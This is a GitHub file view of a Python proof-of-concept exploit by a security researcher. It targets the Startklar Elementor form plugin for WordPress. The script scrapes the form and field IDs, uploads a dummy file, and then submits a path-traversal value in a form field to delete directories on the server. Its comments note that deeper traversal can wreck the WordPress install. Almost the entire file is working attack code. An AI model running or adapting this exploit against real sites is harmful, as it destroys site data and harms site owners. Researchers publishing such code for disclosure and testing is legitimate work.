-
-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit.py
90 lines (65 loc) · 2.39 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
import re
from io import BytesIO
import requests
"""
Author: Mat Rollings (stealthcopter)
Website: sec.stealthcopter.com
"""
TARGET = 'http://wordpress.local:1337'
POST_ID = 15
PATH = '../../../../../pyslurper/'
# ../../../ = /wp-content/uploads/elementor
# ../../../../ = /wp-content/uploads/
# ../../../../../ = /wp-content/
# ../../../../../../ = / (root WordPress dir)
# Note that the first two are recoverable, but the latter few are prob going to destroy your WordPress instance.
session = requests.session()
# Proxy can be uncommented here for debugging:
# session.proxies = {'http': 'http://localhost:8080'}
def dummy_upload(field_id):
# Create a fake JPG file in memory
fake_file = BytesIO(b'AAAA')
fake_file.name = 'hello.jpg'
files = {
'file': ('hello.jpg', fake_file, 'image/jpeg')
}
data = {
'hash_961': field_id
}
response = requests.post(f'{TARGET}/wp-admin/admin-ajax.php?action=startklar_drop_zone_upload_process', files=files, data=data)
print(response.text)
def get_form_id(post_id):
r = session.get(f'{TARGET}/?p={post_id}')
nonce_pattern = r'name="form_id" value="([a-zA-Z0-9]+)"'
nonce = re.search(nonce_pattern, r.text)
return nonce.group(1)
def get_field_id(post_id):
r = session.get(f'{TARGET}/?p={post_id}')
nonce_pattern = r'name="form_fields\[(field_[a-zA-Z0-9]+)\]"'
nonce = re.search(nonce_pattern, r.text)
return nonce.group(1)
def do_delete(post_id, form_id, field_id, path):
data = {
'action': 'elementor_pro_forms_send_form',
'post_id': post_id,
'queried_id': post_id,
'form_id': form_id,
f'form_fields[{field_id}]': '{"files_amount":1,"allowed_file_types_for_upload":".jpg, .pdf, .png, .php","maximum_upload_file":10,"path_type":"abs_path","dropzone_hash":"'+path+'"}',
}
r = session.post(f'{TARGET}/wp-admin/admin-ajax.php', data=data)
print(r.text)
def exploit():
form_id = get_form_id(POST_ID)
if not form_id:
print('[!] Error could not get form id')
return False
print(f'[+] Form ID: {form_id}')
field_id = get_field_id(POST_ID)
if not field_id:
print('[!] Error could not get field id')
return False
print(f'[+] Field ID: {field_id}')
# Need a dummy upload so that the path exists...
dummy_upload(field_id)
do_delete(POST_ID, form_id, field_id, PATH)
exploit()